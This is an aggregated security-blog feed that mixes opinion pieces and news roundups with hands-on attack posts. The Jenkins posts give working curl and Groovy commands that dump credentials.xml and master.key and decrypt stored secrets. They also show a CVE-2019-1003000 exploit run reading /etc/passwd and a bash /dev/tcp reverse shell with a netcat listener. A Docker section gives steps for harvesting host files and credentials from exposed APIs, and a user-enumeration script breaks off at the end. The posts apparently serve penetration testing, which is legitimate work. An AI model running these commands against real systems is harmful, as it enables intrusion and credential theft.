
Creating Meaningful Diversity of Thought in the Cybersecurity Workforce

The other day, I learned something that great French winemakers have known for centuries: It is often difficult to make a complex wine from just one variety of grape. It is easier to blend the juice from several grapes to achieve the structure and nuance necessary to truly delight the palate.

We are similarly relearning that building diversity into the cybersecurity workforce allows us to more easily tackle a wider range of problems and get to better, faster solutions.

Essential New Facets of Diversity

I don’t want to strain the metaphor too much, but we can certainly learn from our winemaking friends. Just as they search for juice with attributes such as structure, fruitiness and acidity, we search for ways to add the personal attributes that will be accretive to the problem-solving prowess and design genius of our teams. One of my personal quests has been to add the right mix of business skills to the technical teams I have had the honor to lead.

On my personal best practice adoption tour, I have made many familiar stops. I learned and then taught Philip Crosby’s Total Quality Management system and fretted about our company’s whole-product marketing mastery in the ’90s (thank you, Geoffrey Moore, author of “Crossing the Chasm”). Over the last 15 years, I implemented ITIL, lean principles and agile development (see the “Manifesto for Agile Software Development”), applied core and context thinking (“Dealing with Darwin”) to help my teams establish skill set development plans, and used horizon planning (introduced in “The Alchemy of Growth” by Baghai, Coley and White) to assign budget.

Throughout this journey, I kept trying to add the best practices that were intended for development, manufacturing and marketing to the mix. I was just not content to “stay in my lane.” I did this because I believe that speaking the language of development, manufacturing and marketing — aka the language of business — is essential for technology and security.

Innovation and the Language of Business

As a security evangelist, I have long advocated that chief information security officers (CISOs) must learn how to be relevant to the business and fluent in the language of business. A side benefit I did not fully explore at the time was how much the diversity of thought helped me in problem-solving.

We have been discovering the value of diversity of thought through programs such as IBM’s new collar initiative and the San Diego Cyber Center of Excellence (CCOE)’s Internship and Apprenticeship Programs. IBM’s initiative and the CCOE’s program rethink recruiting to pull workers into cybersecurity from adjacent disciplines, not just adjacent fields.

Toward the end of my stay at Intuit, I participated in a pilot program that brought innovation catalyst training to leaders outside of product development. Innovation catalysts teach the use of design thinking to deliver what the customer truly wants in a product. While learning the techniques I would later use to coach my teams and tease out well-designed services — services that would delight our internal customers — I was struck by an observation: People of different job disciplines didn’t just solve problems in different ways, they brought different values and valued different outcomes.

So, another form of diversity we should not leave out is the diversity of values derived from different work histories and job functions. We know that elegant, delightful systems that are socially and culturally relevant, and that respect our time, our training and the job we are trying to do, will have a higher adoption rate. We struggle with how to develop these systems with built-in security because we know that bolted-on security has too many seams to ever be secure.

To achieve built-in security, we’ve tried to embed security people in development and DevOps processes, but we quickly run out of security people. We try to supplement with security-minded employees, advocates and evangelists, but no matter how many people we throw at the problem, we are all like Sisyphus, trying to push an ever-bigger rock up an ever-bigger hill.

The Value of Inherently Secure Products

The problem, I think, is that we have not learned how to effectively incorporate the personal value and social value of inherently secure products. We think “make it secure too” instead of “make it secure first.” When I think about the design teams I’ve worked with as I was taking the catalyst training, the very first focus was on deep customer empathy — ultimate empathy for the job the customer is trying to do with our product or service.

People want the products they use to be secure; they expect it, they demand it. But we make it so difficult for them to act securely, and they become helpless. Helpless people do not feel empowered to act safely, they become resigned to being hacked, impersonated or robbed.

The kind of thinking I am advocating for — deep empathy for the users of the products and services we sell and deploy — has led to what I believe, and studies such as IBM’s “Future of Identity Study” bear out, is the imminent elimination of the password. No matter how hard we try, we are not going to get significantly better password management. Managing 100-plus passwords will never be easy. Not having a password is easy, at least for the customer.

We have to create a new ecosystem for authentication, including approaches such as the intelligent authentication that IAmI provides. Creating this new ecosystem gives us an opportunity to delight the customer. Writing rules about what kinds of passwords one can use and creating policies to enforce the rules only delights auditors and regulators. I won’t say we lack the empathy gene, but our empathy is clearly misplaced.

Variety Is the Spice of the Cybersecurity Workforce

As we strive to create products and services that are inherently secure — aka secure by design — let’s add the diversity of approach, diversity of values and advocacy for deep customer empathy to the cybersecurity workforce diversity we are building. Coming back to my recent learning experience, I much prefer wines that were crafted by selecting grape attributes that delight the palate over ones that were easy to farm.

The post Creating Meaningful Diversity of Thought in the Cybersecurity Workforce appeared first on Security Intelligence.

Cyber war is here, according to 87% of security professionals

A study from Venafi has concluded that the world is in the midst of a cyber war, with 72% of respondents believing nation-states have the right to ‘hack back’ at cybercriminals.

The post Cyber war is here, according to 87% of security professionals appeared first on The Cyber Security Place.

This Week in Security News: Security Vulnerabilities

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn what critical approaches can protect your enterprise business from software vulnerabilities. Also, learn about vulnerabilities in IoT alarms that let hackers hijack cars.

Read on:

How to get Ahead of Vulnerabilities and Protect your Enterprise Business

There are several critical approaches today’s businesses and IT teams can take to safeguard their organization from software vulnerabilities.


Researchers Find Critical Backdoor in Swiss Online Voting System

Researchers have found a severe issue in the new Swiss internet voting system that they say would let someone alter votes undetected. They say it should put a halt to Switzerland’s plan to roll out the system in real elections this year.

New SLUB Backdoor Uses GitHub, Communicates via Slack

Trend Micro recently came across previously unknown malware that piqued researchers’ interest: it was spread via watering hole attacks and communicated over the Slack platform.

Navy, Industry Partners Are ‘Under Cyber Siege’ by Chinese Hackers, Review Asserts

The Navy and its industry partners are “under cyber siege” by Chinese hackers and others who have stolen national security secrets in recent years, exploiting critical weaknesses that threaten the U.S.’s standing as the world’s top military power. 

A Machine Learning Model to Detect Malware Variants

For malware that is difficult to discover, Trend Micro proposes a machine learning model that uses an adversarial autoencoder and semantic hashing to find what bad actors try to hide.

Trend Micro: IoT Brings Innovation, But Also Threats

The growth of 5G and the Internet of Things may be helping to bring smarter and more connected experiences and services around the world, but may also be exposing users to more security worries.

Vulnerabilities in Smart Alarms Can Let Hackers Hijack Cars

Vulnerabilities in third-party car alarms managed via their mobile applications were uncovered and seem to affect around 3 million cars that use these “smart” internet-of-things (IoT) devices.

Facebook Sues Ukrainian Hackers Who Stole User Info Via Personality Quizzes

Facebook filed a lawsuit against two Ukrainian nationals who allegedly used personality quizzes to steal user information from 63,000 people between 2016 and 2018, mostly in Russia. 

StackStorm DevOps Software Vulnerability CVE-2019-9580 Allows Remote Code Execution

Popular open-source DevOps automation software StackStorm was reported to have a critical vulnerability that could allow remote attackers to perform arbitrary commands on targeted servers.

Do you think vulnerabilities in IoT car devices will decrease throughout the year? Why or why not? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.


Application Security Has Nothing to Do With Luck

This St. Patrick’s Day is sure to bring all the usual trappings: shamrocks, the color green, leprechauns and pots of gold. But while we take a step back to celebrate Irish culture and the first signs of spring this year, the development cycle never stops. Think of a safe, secure product and a confident, satisfied customer base as the pot of gold at the end of your release rainbow. To get there, you’ll need to add application security to your delivery pipeline, but it’s got nothing to do with luck. Your success depends on your organizational culture.

It’s Time to Greenlight Application Security

Because security issues in applications have left so many feeling a little green, consumers now expect and demand security as a top priority. However, some organizations see security efforts as red, as in a red stop light or stop sign; others see them as a cautious yellow at best. But what if security actually enabled you to go faster?

By adding application security early in the development cycle, developers can obtain critical feedback to resolve vulnerabilities in context when they first occur. This earlier resolution can actually reduce overall cycle times. In fact, a 2016 Puppet Labs survey found that “high performers spend 50 percent less time remediating security issues than low performers,” which the most recent edition attributed to the developers building “security into the software delivery cycle as opposed to retrofitting security at the end.” The 2018 study also noted that high-performing organizations were 24 times more likely to automate security configurations.

Go green this spring by making application security testing a part of your overall quality and risk management program, and soon you’ll be delivering faster, more stable and more secure applications to happier customers.

Build Your AppSec Shamrock

Many people I talk to today are working hard to find the perfect, balanced four-leaf clover of application modernization, digital transformation, cloud computing and big data to strike gold in the marketplace. New methodologies such as microservice architectures and new container-based delivery models create an ever-changing threat landscape, and it’s no wonder that security teams feel overwhelmed.

A recent Ponemon Institute study found that 88 percent of cybersecurity teams spend at least 25 hours per week investigating and detecting application vulnerabilities, and 83 percent spend at least that much time on remediation efforts. While it’s certainly necessary to have these teams in place to continuously investigate and remediate incidents, they should ideally focus on vulnerabilities that cannot be found by other means.

A strong presence in the software delivery life cycle will allow other teams to handle more of the common and easier-to-fix issues. For a start this St. Patrick’s Day, consider establishing an application security “shamrock” that includes:

  • Static application security testing (SAST) for developer source code changes;
  • Dynamic application security testing (DAST) for key integration stages and milestones; and
  • Open-source software (OSS) to identify vulnerabilities in third-party software.

You can enhance each of these elements by leveraging automation, intelligence and machine learning capabilities. Over time, you can implement additional testing capabilities, such as interactive application security testing (IAST), penetration testing and runtime application self-protection (RASP), for more advanced insight, detection and remediation.

Get Off to a Clean Start This Spring

In the Northern Hemisphere, St. Patrick’s Day comes near the start of spring, and what better time to think about new beginnings for your security program. Start by incorporating application security in your delivery pipeline early and often to more quickly identify and remediate vulnerabilities. Before long, you’ll find that your security team has much more time to deal with more critical flaws and incidents. With developers and security personnel working in tandem, the organization will be in a much better position to release high-quality applications that lead to greater consumer trust, lower risk and fewer breaches.

The post Application Security Has Nothing to Do With Luck appeared first on Security Intelligence.

Shifting Left Is a Lie… Sort of

It would be hard to be involved in technology in any way and not see the dramatic upward trend in DevOps adoption. In their January 2019 publication “Five Key Trends To Benchmark DevOps Progress,” Forrester Research found that 56 percent of firms were ‘implementing, implemented or expanding’ DevOps. Further, 51 percent of adopters have embraced […]… Read More

The post Shifting Left Is a Lie… Sort of appeared first on The State of Security.

Jenkins – CVE-2018-1000600 PoC

second exploit from the blog post

Chained with CVE-2018-1000600 to a Pre-auth Fully-responded SSRF

This affects the GitHub plugin that is installed by default. However, I learned that when you spin up a new Jenkins instance, it pulls all the updated plugins (also by default). I'm honestly not sure how often people leave update-to-latest-plugin on by default, but it does seem to knock down some of this stuff.

exploit works against: GitHub Plugin up to and including 1.29.1

When I installed Jenkins today (25 Feb 19), it installed 1.29.4 by default, thus the below does NOT work.

From the blog post:

CSRF vulnerability and missing permission checks in GitHub Plugin allowed capturing credentials 
It can extract any stored credentials with known credentials ID in Jenkins. But the credentials ID is a random UUID if there is no user-supplied value provided. So it seems impossible to exploit this?(Or if someone know how to obtain credentials ID, please tell me!)
Although it can’t extract any credentials without known credentials ID, there is still another attack primitive - a fully-response SSRF! We all know how hard it is to exploit a Blind SSRF, so that’s why a fully-responded SSRF is so valuable!

To get old versions of the plugin and info you can go to

download old versions

Five Easy Steps to Keep on Your Organization’s DevOps Security Checklist

The discovery of a significant container-based (runc) exploit sent shudders across the Internet. Exploitation of CVE-2019-5736 can be achieved with “minimal user interaction”; it subsequently allows attackers to gain root-level code execution on the host. Scary, to be sure. Scarier, however, is that the minimal user interaction was made easier by failure to follow a […]… Read More

The post Five Easy Steps to Keep on Your Organization’s DevOps Security Checklist appeared first on The State of Security.

Jenkins – messing with exploits pt3 – CVE-2019-1003000


This post covers the Orange Tsai Jenkins pre-auth exploit

Vuln versions: Jenkins < 2.137 (preauth)

Pipeline: Declarative Plugin up to and including 1.3.4
Pipeline: Groovy Plugin up to and including 2.61
Script Security Plugin up to and including 1.49  (in CG's testing 1.50 is also vuln)

The exploitdb link above lists a nice self-contained exploit that will compile the JAR for you and serve it up for retrieval by the vulnerable Jenkins server.

nc -l 8888 -vv

bash: no job control in this shell
bash-3.2$ jenkins

After Jenkins 2.138 the preauth is gone, but if you have an overall read token and the plugins are still vulnerable, you can still exploit that server. Just add your cookie to the script and it will hit the URL with your authenticated cookie.

Jenkins – Identify IP Addresses of nodes

While doing some research, I found several posts on Stack Overflow asking how to identify the IP address of nodes. You might want to know this if you read the decrypting-credentials post and managed to get yourself some SSH keys for nodes, but you can't actually see a node's IP in the Jenkins UI.

Stackoverflow link:
blog on setting up a node:

There are great answers in the Stack Overflow post on using the script console, but in the event you find yourself with just the Jenkins directory or no access to the script console, it's pretty easy to get this information.

You can just browse to jenkins-ip/computer/$nodename/config.xml. This request will require the extended read permission.

Optionally, if you are on the box or have a backup, you can go to jenkins-dir/nodes/$nodename/config.xml
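As a concrete sketch of pulling the address out, the snippet below fakes a node's config.xml (the element names match what an SSH-launched node would have, but the values are made up) and extracts the `<host>` element, which carries the node's IP:

```shell
# Sketch: recover a node's IP from its config.xml. The sample file below is
# fabricated; on a real box the file lives at jenkins-dir/nodes/$nodename/config.xml,
# or can be fetched with: curl -u user:apitoken http://jenkins-ip/computer/$nodename/config.xml
cat > /tmp/node-config.xml <<'EOF'
<slave>
  <name>build-01</name>
  <launcher class="hudson.plugins.sshslaves.SSHLauncher">
    <host>10.0.4.17</host>
    <port>22</port>
  </launcher>
</slave>
EOF
# the <host> element holds the node's address for SSH-launched agents
sed -n 's:.*<host>\(.*\)</host>.*:\1:p' /tmp/node-config.xml
```

The same sed one-liner works on the file fetched over HTTP.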

Hundreds of Vulnerable Docker Hosts Exploited by Cryptocurrency Miners

Docker is a technology that allows you to perform operating system level virtualization. An incredible number of companies and production hosts are running Docker to develop, deploy and run applications inside containers.

You can interact with Docker via the terminal and also via remote API. The Docker remote API is a great way to control your remote Docker host, including automating the deployment process, control and get the state of your containers, and more. With this great power comes a great risk — if the control gets into the wrong hands, your entire network can be in danger.

In February, a new vulnerability (CVE-2019-5736) was discovered that allows an attacker to gain root access on the host from a Docker container. The combination of this new vulnerability and an exposed remote Docker API can lead to a fully compromised host.

According to Imperva research, the exposed Docker remote API has already been taken advantage of by hundreds of attackers, including many using the compromised hosts to mine a lesser-known, albeit rising, cryptocurrency for their financial benefit.

In this post you will learn about:

  • Publicly exposed Docker hosts we found
  • The risk they can put organizations in
  • Protection methods

Publicly Accessible Docker Hosts

The Docker remote API listens on ports 2375/2376. By default, the remote API is only accessible from the loopback interface (“localhost”) and should not be available from external sources. However, as with other cases, for example the publicly accessible Redis servers abused by RedisWannaMine, organizations sometimes misconfigure their services, allowing easy access to their sensitive data.

We used the Shodan search engine to find open ports running Docker.

We found 3,822 Docker hosts with the remote API exposed publicly.

We wanted to see how many of these IPs were really exposed. In our research, we tried to connect to the IPs on port 2375 and list the Docker images. Of the 3,822 IPs, approximately 400 were accessible.
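To make that check concrete, here is a minimal sketch; `203.0.113.10` is a documentation placeholder, and the function only composes and prints the HTTP call (the remote API speaks plain HTTP, so no docker client is needed):

```shell
# Sketch: compose the probe that lists images on an exposed Docker remote
# API. 203.0.113.10 is a placeholder, not a real target; only run the
# printed command against hosts you are authorized to test.
probe_cmd() {
  # $1 = host; /images/json is the remote API endpoint behind `docker images`
  echo "curl -s --max-time 5 http://$1:2375/images/json"
}
probe_cmd "203.0.113.10"
```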

Red indicates Docker images of crypto miners, while green shows production environments and legitimate services  

We found that most of the exposed Docker remote API IPs are running a cryptocurrency miner for a currency called Monero. Monero transactions are obfuscated, meaning it is nearly impossible to track the source, amount, or destination of a transaction.  

Other hosts were running what seemed to be production environments of MySQL database servers, Apache Tomcat, and others.

Hacking with the Docker Remote API

The possibilities for attackers after spawning a container on hacked Docker hosts are endless. Mining cryptocurrency is just one example. They can also be used to:

  • Launch more attacks with masked IPs
  • Create a botnet
  • Host services for phishing campaigns
  • Steal credentials and data
  • Pivot attacks to the internal network

Here are some script examples for the above attacks.

1. Access files on the Docker host and mounted volumes

By starting a new container and mounting a folder from the host into it, we got access to other files on the Docker host:

It is also possible to access data outside of the host by looking at container mounts. Using the docker inspect command, you can find mounts to external storage such as NFS, S3 and more. If the mount has write access, you can also change the data.
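A sketch of what step 1 looks like with the docker CLI pointed at a remote host; the functions only print the commands, and the host and container names are placeholders:

```shell
# Sketch of step 1 (commands are printed, not executed; names are placeholders).
host_fs_cmd() {
  # mount the remote host's root filesystem read-only into a throwaway container
  echo "docker -H tcp://$1:2375 run --rm -v /:/host:ro alpine ls /host/etc"
}
list_mounts_cmd() {
  # list a container's mounts; external storage such as NFS shows up here
  echo "docker -H tcp://$1:2375 inspect --format '{{json .Mounts}}' $2"
}
host_fs_cmd "203.0.113.10"
list_mounts_cmd "203.0.113.10" "target-container"
```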

2. Scan the internal network

When a container is created on one of the predefined Docker networks, “bridge” or “host,” attackers can use it to reach hosts the Docker host can access on the internal network. We used nmap to scan the host network to find services. We did not need to install it; we simply used a ready-made image from Docker Hub:
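A sketch of such a scan, printed rather than executed; instrumentisto/nmap is an assumption (one public nmap image, not necessarily the one used in the research), and 172.17.0.1 is the default bridge-network gateway, i.e. the Docker host itself:

```shell
# Sketch of step 2: run nmap from a public image against the default bridge
# gateway. Host address and image choice are assumptions for illustration.
nmap_cmd() {
  echo "docker -H tcp://$1:2375 run --rm instrumentisto/nmap -sT -p 1-1024 172.17.0.1"
}
nmap_cmd "203.0.113.10"
```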

It is possible to find other open Docker ports and navigate inside the internal network by looking for more Docker hosts as described in our Redis WannaMine post.

3. Credentials leakage

It is very common to pass arguments to a container as environment variables, including credentials such as passwords. You can find examples of passwords sent as environment variables in the documentation of many Docker repositories.

We found three simple ways to detect credentials using the Docker remote API:

Docker inspect command

“env” command on a container

Docker inspect doesn’t return all environment variables; for example, it doesn’t return ones that were passed to docker run using the --env-file argument. Running the env command on a container will return the entire list:
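Side by side, the two approaches look like this (printed commands, placeholder names); only exec env sees variables loaded from an --env-file:

```shell
# Sketch of the two env-dumping techniques (printed, not executed).
inspect_env_cmd() {
  # shows only the Env list from the container's config
  echo "docker -H tcp://$1:2375 inspect --format '{{json .Config.Env}}' $2"
}
exec_env_cmd() {
  # dumps the full runtime environment, including --env-file values
  echo "docker -H tcp://$1:2375 exec $2 env"
}
inspect_env_cmd "203.0.113.10" "target-container"
exec_env_cmd "203.0.113.10" "target-container"
```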

Credentials files on the host

Another option is mounting known credentials directories from the host. For example, AWS credentials have a default location for the CLI and other libraries, and you can simply start a container with a mount to that known directory and access a credentials file like “~/.aws/credentials”.
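For instance (printed command, placeholder host; the path is the CLI default):

```shell
# Sketch: read the default AWS credentials file off the host by mounting
# its directory into a container (printed, not executed).
aws_creds_cmd() {
  echo "docker -H tcp://$1:2375 run --rm -v /root/.aws:/aws:ro alpine cat /aws/credentials"
}
aws_creds_cmd "203.0.113.10"
```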

4. Data Leakage

Here is an example of how a database and credentials can be detected, in order to run queries on a MySQL container:
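A sketch of the idea, reusing the MYSQL_ROOT_PASSWORD environment variable that leaked from the container itself (printed command; host and container names are placeholders):

```shell
# Sketch of step 4: query MySQL with the password found in the container's
# own environment (printed, not executed; names are placeholders).
mysql_query_cmd() {
  echo "docker -H tcp://$1:2375 exec $2 sh -c 'mysql -uroot -p\"\$MYSQL_ROOT_PASSWORD\" -e \"SHOW DATABASES;\"'"
}
mysql_query_cmd "203.0.113.10" "db-container"
```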

Wrapping Up

In this post, we saw how dangerous exposing the Docker API publicly can be.

Exposing Docker ports can be useful, and may be required by third-party apps like Portainer, a management UI for Docker.

However, you have to make sure to create security controls that allow only trusted sources to interact with the Docker API. See the Docker documentation on Securing Docker remote daemon.

Imperva is going to release a cloud discovery tool to better help IT, network and security administrators answer two important questions:

  • What do I have?
  • Is it secure?

The tool will be able to discover and detect publicly-accessible ports inside the AWS account(s). It will also scan both instances and containers. To try it, please contact Imperva sales.

We also saw how credentials stored as environment variables can be retrieved. It is very common and convenient, but far from secure. Instead of using environment variables, it is possible to read the credentials at runtime (depending on your environment). In AWS you can use roles and KMS. In other environments, you can use third-party tools like Vault or credstash.

The post Hundreds of Vulnerable Docker Hosts Exploited by Cryptocurrency Miners appeared first on Blog.

Jenkins – decrypting credentials.xml

If you find yourself on a Jenkins box with script console access, you can decrypt the saved passwords in credentials.xml in the following way:


passwd = hudson.util.Secret.decrypt(hashed_pw)

You need to perform this on the Jenkins system itself, as it uses the local master.key and hudson.util.Secret

Screenshot below

Code to get the credentials.xml from the script console


def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'cmd.exe /c type credentials.xml'.execute()
proc.consumeProcessOutput(sout, serr)
println "out> $sout err> $serr"


def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'cat credentials.xml'.execute()
proc.consumeProcessOutput(sout, serr)
println "out> $sout err> $serr"

If you just want to do it with curl you can hit the scriptText endpoint and do something like this:


curl -u admin:admin --data "script=def+sout+%3D+new StringBuffer(),serr = new StringBuffer()%0D%0Adef+proc+%3D+%27cmd.exe+/c+type+credentials.xml%27.execute%28%29%0D%0Aproc.consumeProcessOutput%28sout%2C+serr%29%0D%0Aproc.waitForOrKill%281000%29%0D%0Aprintln+%22out%3E+%24sout+err%3E+%24serr%22&Submit=Run"

Also, because this syntax took me a minute to figure out, here it is for files in subdirectories:

curl -u admin:admin --data "script=def+sout+%3D+new StringBuffer(),serr = new StringBuffer()%0D%0Adef+proc+%3D+%27cmd.exe+/c+type+secrets%5C\master.key%27.execute%28%29%0D%0Aproc.consumeProcessOutput%28sout%2C+serr%29%0D%0Aproc.waitForOrKill%281000%29%0D%0Aprintln+%22out%3E+%24sout+err%3E+%24serr%22&Submit=Run"


curl -u admin:admin --data "script=def+sout+%3D+new StringBuffer(),serr = new StringBuffer()%0D%0Adef+proc+%3D+%27cat+credentials.xml%27.execute%28%29%0D%0Aproc.consumeProcessOutput%28sout%2C+serr%29%0D%0Aproc.waitForOrKill%281000%29%0D%0Aprintln+%22out%3E+%24sout+err%3E+%24serr%22&Submit=Run"

Then to decrypt any passwords:

curl -u admin:admin --data "script=println(hudson.util.Secret.fromString('7pXrOOFP1XG62UsWyeeSI1m06YaOFI3s26WVkOsTUx0=').getPlainText())"

If you are in a position where you have the files but no access to jenkins you can use:

There is a small bug in the Python script when it does the regex, and I haven't bothered to fix it as of this post. But here is a version where, instead of the regex, I'm just printing out the values so you can see the decrypted password. The change is on line 55.

Edit 4 March 19: the script only regexes for passwords (line 72); you might need to swap out the regex if there are SSH keys or other credential types in the credentials.xml file :-)

Jenkins – SECURITY-200 / CVE-2015-5323 PoC

API tokens of other users available to admins

SECURITY-200 / CVE-2015-5323

API tokens of other users were exposed to admins by default. On instances that don’t implicitly grant RunScripts permission to admins, this allowed admins to run scripts with another user’s credentials.

Affected versions
All Jenkins main line releases up to and including 1.637

All Jenkins LTS releases up to and including 1.625.1

Tested against Jenkins 1.637

From the script console:
run some groovy code to get the token of another user

wrong token

correct token

Jenkins Master Post

A collection of posts on attacking Jenkins
Manipulating build steps to get RCE

Using the terminal plugin to get RCE

Getting started with Jenkins Plugins

Vulns in:

  • Pipeline: Declarative Plugin up to and including 1.3.4
  • Pipeline: Groovy Plugin up to and including 2.61
  • Script Security Plugin up to and including 1.49
Blog post says: This issue has been fixed in Jenkins version 2.121.1 LTS (2.132 weekly).

CVE-2019-1003000
CVE-2015-8103 & CVE-2016-0792
CVE-2017-1000353 PoC
CVE-2018-1999002 (windows) Arbitrary file read

An arbitrary file read vulnerability exists in the Stapler web framework used by Jenkins 2.132 and earlier and 2.121.1 and earlier. On Windows, directories that don't exist can be traversed via ../, so arbitrary files can be read. On Linux, the traversal only works if a directory with _ exists in the Jenkins plugins directory.
Decrypting credentials.xml

Jenkins, windows, powershell
CVE-2018-1999001: a malformed request moves the config.xml file; after a restart, anyone can log in. Couple it with a DoS (CVE-2018-1999043) to force the restart.
  • Jenkins weekly up to and including 2.132
  • Jenkins LTS up to and including 2.121.1

CG Posts:
Username enumeration Jenkins 2.137 and below

Jenkins - SECURITY-200 / CVE-2015-5323 PoC (API tokens of other users available to admins)

Jenkins - SECURITY-180/CVE-2015-1814 PoC (Forced Token Change)
Decrypting Jenkins credentials.xml
Jenkins - CVE-2018-1000600 SSRF in GitHub plugin

Jenkins - CVE-2019-1003000 Pt 1
Jenkins - CVE-2019-1003000 Pt 2 - Orange Tsai exploit
Jenkins - Identify IP Addresses of nodes

Jenkins – messing with exploits pt2 – CVE-2019-1003000

After the release of Orange Tsai's exploit for Jenkins, I've been doing some poking. Pre-auth RCE against Jenkins is something everyone wants.

While not totally related to the blog post and tweet, the following exploit came up while searching.

What I have figured out is that the plugin versions matter for this latest round of Jenkins exploits. TBH, I never paid much attention to the plugins in the past, as the issues have been with core Jenkins (as with the first blog post), but you can get a look at them by going to jenkins-server/pluginManager/installed

Jenkins plugin manager
It does require admin permissions or you get this:

No permissions for Jenkins plugin manager

If you do have permissions, you can also hit it with the jenkins-cli client and pull the info:

$ java -jar jenkins-cli.jar -s -auth admin:admin list-plugins

jsch                               JSch dependency plugin                                           0.1.55
structs                            Structs Plugin                                                   1.17
apache-httpcomponents-client-4-api Apache HttpComponents Client 4.x API Plugin                      4.5.5-3.0
mailer                             Mailer Plugin                                                    1.23
command-launcher                   Command Agent Launcher Plugin                                    1.3
workflow-api                       Pipeline: API                                                    2.33
workflow-job                       Pipeline: Job                                                    2.31
ssh-credentials                    SSH Credentials Plugin                                           1.14
authentication-tokens              Authentication Tokens API Plugin                                 1.3
workflow-cps-global-lib            Pipeline: Shared Groovy Libraries                                2.13
jackson2-api                       Jackson 2 API Plugin                                             2.9.8
pipeline-stage-tags-metadata       Pipeline: Stage Tags Metadata                          
pipeline-milestone-step            Pipeline: Milestone Step                                         1.3.1
credentials                        Credentials Plugin                                               2.1.18
lockable-resources                 Lockable Resources plugin                                        2.4
jquery-detached                    JavaScript GUI Lib: jQuery bundles (jQuery and jQuery UI) plugin 1.2.1
workflow-scm-step                  Pipeline: SCM Step                                               2.7
matrix-auth                        Matrix Authorization Strategy Plugin                             2.3
matrix-project                     Matrix Project Plugin                                            1.13
pipeline-stage-step                Pipeline: Stage Step                                             2.3
pipeline-build-step                Pipeline: Build Step                                             2.7
pipeline-input-step                Pipeline: Input Step                                             2.9
bouncycastle-api                   bouncycastle API Plugin                                          2.17
handlebars                         JavaScript GUI Lib: Handlebars bundle plugin                     1.1.1
momentjs                           JavaScript GUI Lib: Moment.js bundle plugin                      1.1.1
plain-credentials                  Plain Credentials Plugin                                         1.5
docker-commons                     Docker Commons Plugin                                            1.13
git-client                         Git client plugin                                                2.7.6
pipeline-rest-api                  Pipeline: REST API Plugin                                        2.10
workflow-basic-steps               Pipeline: Basic Steps                                            2.14
credentials-binding                Credentials Binding Plugin                                       1.17 (1.18)
pipeline-stage-view                Pipeline: Stage View Plugin                                      2.10
workflow-multibranch               Pipeline: Multibranch                                            2.20
script-security                    Script Security Plugin                                           1.49 (1.53)
git-server                         GIT server Plugin                                                1.7
workflow-step-api                  Pipeline: Step API                                               2.19
pipeline-graph-analysis            Pipeline Graph Analysis Plugin                                   1.9
pipeline-model-api                 Pipeline: Model API                                    
workflow-cps                       Pipeline: Groovy                                                 2.61 (2.63)
branch-api                         Branch API Plugin                                                2.1.2
jdk-tool                           JDK Tool Plugin                                                  1.2
cloudbees-folder                   Folders Plugin                                                   6.7
durable-task                       Durable Task Plugin                                              1.29
junit                              JUnit Plugin                                                     1.27
scm-api                            SCM API Plugin                                                   2.3.0
ace-editor                         JavaScript GUI Lib: ACE Editor bundle plugin                     1.1
display-url-api                    Display URL API                                                  2.3.0
workflow-support                   Pipeline: Supporting APIs                                        3.2

AFAIK you can't enumerate installed plugins and their versions without (elevated) authentication like you can with things like WordPress. If you know how, please let me know. For the time being, I guess it's just throwing things to see what sticks.

As I mentioned, the latest particular vulns are issues with installed Jenkins plugins. Taking a look at CVE-2019-1003000, we can see that it affects the Script Security Plugin (the CVE says 2.49, but that's a typo and should be 1.49), as seen on the Jenkins advisory.

An exploit for the issue exists and is publicly available; it even comes with a docker config to spin up a vulnerable version to try it out on. What's important about this particular exploit is that it IS post-auth, but it doesn't require script permissions, only Overall/Read permission and Job/Configure permissions.

I'm seeing more and more servers/admins (rightfully) block access to the /script and /scriptText console because it's well documented that it is an immediate RCE.
I encourage you to read the whole readme file in the repo but the most important part is here:

A flaw was found in Pipeline: Declarative Plugin before version, Pipeline: Groovy Plugin before version 2.61.1 and Script Security Plugin before version 1.50
This PoC is using a user with Overall/Read and Job/Configure permission to execute a maliciously modified build script in sandbox mode, and try to bypass the sandbox mode limitation in order to run arbitrary scripts (in this case, we will execute system command).
As a background, Jenkins's pipeline build script is written in groovy. This build script will be compiled and executed in Jenkins master or node, containing definition of the pipeline, e.g. what to do in slave nodes. Jenkins also provide the script to be executed in sandbox mode. In sandbox mode, all dangerous functions are blacklisted, so regular user cannot do anything malicious to the Jenkins server.

Running the exploit:

 python2.7 --url http://localhost:8080 --job my-pipeline --username user1 --password user1 --cmd "cat /etc/passwd"
[+] connecting to jenkins...
[+] crafting payload...
[+] modifying job with payload...
[+] putting job build to queue...
[+] waiting for job to build...
[+] restoring job...
[+] fetching output...
Started by user User 1
Running in Durability level: MAX_SURVIVABILITY
[Pipeline] echo
xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
jenkins:x:1000:1000:Linux User,,,:/var/jenkins_home:/bin/bash

[Pipeline] End of Pipeline

Finished: SUCCESS

you can certainly pull a reverse shell from it as well.

python2.7 --url http://localhost:8080 --job my-pipeline --username user1 --password user1 --cmd "bash -i >& /dev/tcp/ 0>&1"
[+] connecting to jenkins...
[+] crafting payload...
[+] modifying job with payload...
[+] putting job build to queue...
[+] waiting for job to build...
[+] restoring job...
[+] fetching output...
Started by user User 1
Running in Durability level: MAX_SURVIVABILITY

and you get:

nc -l 4444 -vv

bash: cannot set terminal process group (7): Not a tty

bash: no job control in this shell
bash-4.4$ whoami


The TL;DR is that you can use this exploit to get a shell if an older version of the Script Security Plugin is installed and you have Overall/Read permission and Job/Configure permission, which a regular Jenkins user is more likely to have. Crucially, this exploit doesn't require using the script console.

Jenkins – messing with new exploits pt1

Jenkins notes for:

to download old jenkins WAR files

The first bug in the blog is a username enumeration bug in:

  • Jenkins weekly up to and including 2.145
  • Jenkins LTS up to and including 2.138.1

From the blog:
Pre-auth User Information Leakage
While testing Jenkins, it's a common scenario that you want to perform a brute-force attack but you don't know which account you can try (a valid credential can read the source at least, so it's worth being the first attempt).
In this situation, this vulnerability is useful! Due to the lack of a permission check on the search functionality, by modifying the keyword from a to z, an attacker can list all users on Jenkins!
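Scripted, the a-to-z trick looks something like the sketch below. This is a hedged illustration, not the blog's actual PoC: the `/search/index?q=` endpoint path and the `user/...` link pattern grepped out of the response are assumptions based on the description above, which you'd adjust to what the target actually returns.

```shell
# Build the unauthenticated search URL for a given keyword.
# Endpoint path is an assumption based on the blog's description.
build_search_url() {
  printf '%s/search/index?q=%s' "$1" "$2"
}

# Iterate keywords a..z and collect anything that looks like a user link.
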